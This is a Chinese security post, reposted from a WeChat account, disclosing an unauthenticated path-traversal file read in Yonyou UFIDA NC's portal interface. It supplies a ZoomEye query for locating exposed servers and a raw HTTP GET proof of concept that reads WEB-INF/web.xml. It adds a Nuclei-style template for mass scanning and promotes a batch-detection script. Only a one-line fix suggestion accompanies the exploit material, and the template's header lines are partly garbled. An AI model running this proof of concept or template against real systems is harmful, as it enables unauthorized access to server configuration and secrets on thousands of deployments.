0x01 产品简介
ufida用友财务软件nc好会计,畅捷通旗下集成财务管理必备利器 畅捷通是用友集团的成员企业,致力于为企业提供专业高效的财务管理解决方案。这里我推荐利用 ZoomEye搜索引擎发现影响资产6000+。
声明
请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。
TIPS: 末尾领取资料及福利-批量检测脚本在末尾
0x02 漏洞描述
用友移动系统管理portal接口存在任意文件读取,攻击者可在无需登录的情况下进行任意文件读取。
0x03 ZoomEye语法
app:"用友 UFIDA NC"
0x04 漏洞复现
POC
GET /portal/file?cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2Fwebapps/nc_web/WEB-INF/web.xml HTTP/1.1Host: {}Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=B9F1AC8D34E9DFD16A3A7A4B9CEE4EF9.serverConnection: close
id: yonyou-ufida-nc-filereadinfo:name: yonyou-ufida-nc-filereadauthor: HackTwoseverity: highdescription: |漏洞测试-Testreference:https://tags: autohttp:raw:|+GET /portal/file?cmd=getFileLocal&fileid=../../../../webapps/nc_web/WEB-INF/web.xml HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8: zh-CN,zh;q=0.9: no-cacheConnection: closematchers:type: dsldsl:"contains_all(body, 'version=') && status_code==200 && contains(header,'attachment; filename')"
0x05 修复建议
升级至最新版本,官方已经推出新的版本补丁包。
0x06
原文始发于微信公众号(渗透安全HackTwo):用友portal接口存在任意文件读取漏洞(新)-漏洞挖掘
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论